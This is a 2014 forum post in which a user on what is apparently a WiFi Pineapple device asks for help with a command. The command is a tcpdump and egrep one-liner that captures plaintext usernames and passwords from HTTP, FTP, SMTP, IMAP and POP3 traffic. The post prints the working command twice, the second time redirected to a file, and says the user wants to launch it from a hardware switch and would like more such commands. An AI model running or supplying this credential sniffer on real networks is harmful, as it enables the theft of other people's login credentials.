overwraith Posted May 12, 2014 Share Posted May 12, 2014 (edited) So I found this command online: tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20 At this website: http://www.commandlinefu.com/commands/view/10882/plaintext-credentials-sniffing-with-tcpdump-and-grep Have been scouring the web, trying to figure out it's syntax, and I tried to modify it to send output to a file. Does anybody know what I am doing wrong? Do you all have some commands that are more useful? Here is what I tried to send it to a file: root@Pineapple:~# tcpdump port http or port ftp or port smtp or port imap or por t pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passw d=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto -- line-buffered -B20 > stuff.txt Would be cool to be able to run this from a dip switch. The Color part of the command seems non useful, and the command only lasts a couple of seconds, I was expecting it to run longer. Edited May 16, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.